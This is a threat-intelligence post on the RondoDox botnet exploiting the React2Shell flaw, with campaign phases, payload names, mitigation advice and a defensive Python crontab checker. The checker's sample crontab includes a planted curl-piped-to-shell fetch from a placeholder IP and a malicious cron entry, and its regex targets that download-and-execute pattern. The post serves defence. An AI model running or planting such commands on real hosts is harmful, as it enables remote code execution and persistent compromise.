
React2Shell under attack: RondoDox Botnet spreads through critical flaw

  • Jan 2

Key Findings


  • The RondoDox botnet has been conducting a persistent nine-month campaign targeting IoT devices and web applications.

  • The botnet has been exploiting the recently disclosed React2Shell (CVE-2025-55182, CVSS score: 10.0) vulnerability in Next.js and React Server Components (RSC) to achieve remote code execution on susceptible devices.

  • There are about 90,300 instances that remain vulnerable to React2Shell globally, with the majority (68,400) located in the U.S.

  • The RondoDox botnet has expanded its arsenal by adding new n-day vulnerabilities, including CVE-2023-1389 and CVE-2025-24893.

  • The botnet has been observed deploying cryptocurrency miners, a botnet loader and health checker, and a Mirai botnet variant on infected devices.


Background


The RondoDox botnet, which emerged in early 2025, has been conducting a multi-stage campaign to compromise IoT devices and web applications. The threat actors behind the botnet have been leveraging a variety of security vulnerabilities to expand their reach, including the recently disclosed React2Shell flaw.


React2Shell is a critical vulnerability in React Server Components (RSC) and Next.js that could allow unauthenticated attackers to achieve remote code execution on susceptible devices. According to the Shadowserver Foundation, there are approximately 90,300 instances that remain vulnerable to the flaw as of December 2025, with the majority (68,400) located in the U.S.


Initial Reconnaissance and Vulnerability Scanning


The RondoDox botnet campaign is assessed to have gone through three distinct phases prior to the exploitation of CVE-2025-55182:


1. March - April 2025: Initial reconnaissance and manual vulnerability scanning


2. April - June 2025: Daily mass vulnerability probing of web applications like WordPress, Drupal, and Struts2, and IoT devices like Wavlink routers


3. July - early December 2025: Large-scale, hourly automated deployment


Exploitation of React2Shell Vulnerability


In the attacks detected in December 2025, the threat actors are said to have initiated scans to identify vulnerable Next.js servers, followed by attempts to drop cryptocurrency miners ("/nuts/poop"), a botnet loader and health checker ("/nuts/bolts"), and a Mirai botnet variant ("/nuts/x86") on infected devices.


The "/nuts/bolts" component is designed to terminate competing malware and coin miners before downloading the main bot binary from its command-and-control (C2) server. One variant of the tool has been found to remove known botnets, Docker-based payloads, artifacts left from prior campaigns, and associated cron jobs, while also setting up persistence through "/etc/crontab".


Mitigation Recommendations


To mitigate the risk posed by the RondoDox botnet, organizations are advised to:


  • Update Next.js to a patched version as soon as possible

  • Segment all IoT devices into dedicated VLANs

  • Deploy Web Application Firewalls (WAFs)

  • Monitor for suspicious process execution

  • Block known C2 infrastructure
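The "/nuts/bolts" loader described above persists through "/etc/crontab", and the recommendations call for monitoring suspicious execution. The following is an added example (not code from the page, its sources, or the RondoDox reporting) of a small defender-side check: it parses system-crontab text and flags entries that reference the payload paths named in the reporting ("/nuts/poop", "/nuts/bolts", "/nuts/x86") or that download remote content and pipe it straight into a shell. The download-and-pipe heuristic and the sample crontab (including the 198.51.100.10 documentation address) are assumptions constructed for the example, not indicators from the page.

```python
import re
from typing import Dict, List

# Payload path fragments named in the reporting summarised above (taken from the page).
RONDODOX_ARTIFACTS = ("/nuts/poop", "/nuts/bolts", "/nuts/x86")

# Generic download-and-execute heuristic (an assumption, not from the page):
# curl/wget whose output is piped into sh or bash.
FETCH_PIPE_SHELL = re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(sh|bash)\b")

# System crontab format: minute hour day-of-month month day-of-week user command
CRONTAB_LINE = re.compile(
    r"^(?P<min>\S+)\s+(?P<hour>\S+)\s+(?P<dom>\S+)\s+(?P<mon>\S+)\s+(?P<dow>\S+)\s+"
    r"(?P<user>\S+)\s+(?P<cmd>.+)$"
)
# @reboot / @hourly style entries carry a single schedule token instead of five fields.
CRONTAB_SPECIAL = re.compile(r"^(?P<sched>@\w+)\s+(?P<user>\S+)\s+(?P<cmd>.+)$")


def parse_system_crontab(text: str) -> List[Dict[str, object]]:
    """Return one record per active entry in /etc/crontab-style text.

    Comments, blank lines and VAR=value assignments are skipped. The special
    form is tried first so '@reboot' is not mistaken for a minute field.
    """
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        m = CRONTAB_SPECIAL.match(line) or CRONTAB_LINE.match(line)
        if not m:
            continue
        entries.append({"line": lineno, "user": m.group("user"), "cmd": m.group("cmd")})
    return entries


def classify(cmd: str) -> List[str]:
    """Return the reasons a cron command looks suspicious (empty list if it does not)."""
    reasons = []
    for artifact in RONDODOX_ARTIFACTS:
        if artifact in cmd:
            reasons.append(f"references reported artifact path {artifact}")
    if FETCH_PIPE_SHELL.search(cmd):
        reasons.append("downloads remote content and pipes it to a shell")
    return reasons


def find_suspicious(text: str) -> List[Dict[str, object]]:
    """Parse crontab text and return only the entries that classify() flags."""
    hits = []
    for entry in parse_system_crontab(text):
        reasons = classify(str(entry["cmd"]))
        if reasons:
            hits.append({**entry, "reasons": reasons})
    return hits


# Constructed sample: a Debian-style /etc/crontab with two planted entries.
# The 198.51.100.10 address is from the documentation range, not a real indicator.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/5 *   * * *   root    /tmp/.cache/nuts/bolts >/dev/null 2>&1
@reboot         root    curl -s http://198.51.100.10/nuts/x86 | sh
"""

if __name__ == "__main__":
    # On a live host, replace SAMPLE_CRONTAB with open("/etc/crontab").read().
    for hit in find_suspicious(SAMPLE_CRONTAB):
        print(f"line {hit['line']} ({hit['user']}): {hit['cmd']}")
        for reason in hit["reasons"]:
            print(f"    - {reason}")
```

The checker only covers the system crontab; a fuller sweep would also read /etc/cron.d, the per-user spool directory and the cron.* run-parts directories, and treat any hit as a prompt to pull the referenced binary for analysis rather than as proof of infection on its own.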


Sources


  • https://thehackernews.com/2026/01/rondodox-botnet-exploits-critical.html

  • https://app.daily.dev/posts/rondodox-botnet-exploits-critical-react2shell-flaw-to-hijack-iot-devices-and-web-servers-fu77llwtm

  • https://www.cypro.se/2026/01/01/rondodox-botnet-exploits-critical-react2shell-flaw-to-hijack-iot-devices-and-web-servers/

  • https://x.com/TheCyberSecHub/status/2006667499086164080

  • https://securityaffairs.com/186386/uncategorized/react2shell-under-attack-rondodox-botnet-spreads-miners-and-malware.html
